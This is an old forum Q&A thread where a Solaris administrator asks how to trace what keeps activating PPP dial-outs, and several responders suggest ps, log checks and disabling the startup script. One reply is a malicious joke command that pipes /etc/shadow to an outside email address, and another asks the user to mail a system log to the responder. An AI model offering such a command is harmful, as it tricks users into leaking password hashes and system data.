Solved

WHO IS GOING TO ACTIVATE MY PPP ?

Posted on 1998-09-16
18
288 Views
Last Modified: 2013-12-27
MY WORKSTATION IS NETRAJ RUNNING SOLARIS 2.5.1.
FROM TIME TO TIME THERE IS SOME USER OR PROCESS THAT MAKE REQUIREMENTS TO PPP TO ACTIVATE THE CONNECTION VIA MODEM.
THIS USER OR PROCESS START EVERY 6/10 MINUTES 24 HOURS A DAY.
PLEASE, HOW CAN I FIND WHO IS THIS USER OR PROCESS OR MACHINE CONNECTED IN MY LAN ?
lba
0
Comment
Question by:lba
  • 9
  • 6
  • 2
  • +1
18 Comments
 
LVL 1

Accepted Solution

by:
stormerider earned 100 total points
ID: 2006975
If your caps lock key is broken, fix it.

Try ps -elf | grep ppp. Or just ps -elf | more. If it's happenning a lot, make crontab entries to take snapshots and email them to you.

0 * * * *  /usr/ucb/ps aux | /usr/ucb/mail -s "Process Snapshot" root

(*Assuming this is your box and you have root*).

I know on linux pppd is owned by root so it uses the call syslog to log information to /var/adm/messages. Try checking in there as well.
0
 

Author Comment

by:lba
ID: 2006976
in that way i don't solve my problem because i am not able to exactly know is going to make a request to ppp.
If I make the command ps -efl | grep ppp I only get :
    root   104     1  0 00:02:49 ?        0:00 /usr/sbin/aspppd -d 1
    root  9788  9770  0 12:57:40 pts/4    0:00 grep ppp
But I don't know anything about the request made to ppp.


0
 

Author Comment

by:lba
ID: 2006977
in that way i don't solve my problem because i am not able to exactly know is going to make a request to ppp.
If I make the command ps -efl | grep ppp I only get :
    root   104     1  0 00:02:49 ?        0:00 /usr/sbin/aspppd -d 1
    root  9788  9770  0 12:57:40 pts/4    0:00 grep ppp
But I don't know anything about the request made to ppp.


0
Independent Software Vendors: We Want Your Opinion

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 
LVL 1

Expert Comment

by:stormerider
ID: 2006978
Did you try "grep ppp /var/adm/messages" ?
0
 

Author Comment

by:lba
ID: 2006979
yes,  but it did not find anything !!

0
 
LVL 1

Expert Comment

by:stormerider
ID: 2006980
Who "owns" aspppd (if thats the binary). Do a whereis aspppd and then ls -lag and the path to the binary. Is it root? If you check the man page, does it do some sort of logging? Are you running diald? Can you find any information at all that might be of any use? Have you checked /tmp for files that might be logs?
0
 

Author Comment

by:lba
ID: 2006981
aspppd is owned by root:
# ls -alg aspppd
-r-xr-xr-x   1 sys       101304 Mar 11  1998 aspppd
# pwd
/usr/sbin
----------------------
i am not running diald
----------------------
there is not anything interesting in /tmp
----------------------

0
 
LVL 1

Expert Comment

by:stormerider
ID: 2006982
Do this as well:

man aspppd | mail -s "Aspppd Man Page" stormerider@windsofstorm.net


0
 
LVL 1

Expert Comment

by:stormerider
ID: 2006983
FILES
     /etc/asppp.cf       configuration file
     /etc/log/asppp.log  message log file
 

mail -s "Aspppd logs" stormerider@windsofstorm.net < /etc/log/asppp.log
0
 

Author Comment

by:lba
ID: 2006984
I can make a further detail to my question:
my problem is : who make a request to ppp ?
I know that ppp is activated during boot, but I would like to know which machine ( or process ) of my lan make a requests to PPP service for an external machine .


0
 

Author Comment

by:lba
ID: 2006985
I can make a further detail to my question:
my problem is : who make a request to ppp ?
I know that ppp is activated during boot, but I would like to know which machine ( or process ) of my lan make a requests to PPP service for an external machine .


0
 
LVL 1

Expert Comment

by:stormerider
ID: 2006986
The log file was unintelligable. Call Sun for Support.
0
 

Expert Comment

by:shooters
ID: 2006987
As root do this.
hostname; cat /etc/shadow | mail -s "Dont be a foo" foo@foo.com
0
 

Expert Comment

by:shooters
ID: 2006988
Just turn your modem off.
0
 

Author Comment

by:lba
ID: 2006989
sorry, but i don't understand shooters !!


0
 
LVL 2

Expert Comment

by:blowfish
ID: 2006990
Would you be happy to just turn off PPP?  If that is what you want, then remove /etc/asppp.cf since the start-up script wants that file to exist if the PPP daemon is to start.  Also, you should rename the startup script from /etc/rc2.d/S47asppp to /etc/rc2.d/s47ppp (note the change from "S" to "s"), this will prevent the system from running the script at startup.

--frankf
0
 

Author Comment

by:lba
ID: 2006991
blowfish thank you for your comment, but I don't want to stop PPP, I would like to know who is going to activate requests to PPP.
ciao


0
 

Author Comment

by:lba
ID: 2006992
blowfish thank you for your comment, but I don't want to stop PPP, I would like to know who is going to activate requests to PPP.
ciao


0